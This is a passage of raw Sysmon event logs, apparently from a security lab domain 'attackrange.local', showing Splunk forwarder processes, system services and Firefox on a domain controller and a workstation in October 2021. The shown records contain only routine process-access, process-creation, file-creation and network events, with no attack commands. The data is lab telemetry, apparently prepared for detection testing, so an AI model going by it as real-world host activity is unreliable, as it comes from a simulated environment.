Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000084000Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:58.897{2FDD8D40-B5AA-615A-AA01-00000000FD01}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000108477Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.637{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5AA-615A-8F02-00000000FC01}8364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108476Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.637{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108475Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.637{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108474Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.637{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108473Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.637{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108472Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.637{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B5AA-615A-8F02-00000000FC01}8364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108471Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.637{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5AA-615A-8F02-00000000FC01}8364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108470Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:58.638{58E9C193-B5AA-615A-8F02-00000000FC01}8364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108492Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.974{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108491Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.821{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA9BFC5DA11E86CEB7D09B83F6B2B17A,SHA256=7F96BC40B4958003F0E5210DE399248A021317D800C2503291A8B3D3DE2F8D14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108490Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.374{58E9C193-B5AB-615A-9002-00000000FC01}57605588C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108489Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.190{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5AB-615A-9002-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108488Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.190{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108487Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.190{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108486Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.190{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108485Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.190{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108484Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.190{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B5AB-615A-9002-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108483Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.190{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5AB-615A-9002-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108482Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.191{58E9C193-B5AB-615A-9002-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108481Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.137{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A4900FC7B3D69B735EFAD558D1FEAC1,SHA256=626EB624F307904B1E39E81F1A284A70A5F484F8BF381AAD293885A19B1F1538,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108480Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:59.137{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE088F9DAD9751C6C6B2987487A5F864,SHA256=B4E460C41B7630C2EF268E106D44C12F63A0FD79489A3F0D6B736D598626122A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108479Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:57.338{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51971-false10.0.1.12-8089- 23542300x800000000000000084013Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:59.115{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4E40A7678EEF5F0E5A3991B96E62AA9,SHA256=C4FFD06E8FAFE90ACBF005B1C4B17CC586C0D15CB038EC7B4A98AE506CE3EC52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108504Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:00.836{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3976C73C8FEE0B8AE28C47A0768CB1A,SHA256=7831E8ACA31CC215C53D30932B2C70743B6384545276AA0E9E1D169ED5955D47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084016Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:00.225{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E94F7FA81E797CDF00F6FF7FA7B9800,SHA256=C611F4A8F9F61AC017A19D8062B16F2EDCD1F9DBA1738F89D45B44208035F1D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108503Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:00.256{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5AC-615A-9102-00000000FC01}8224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108502Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:00.254{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108501Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:00.254{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108500Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:00.254{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108499Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 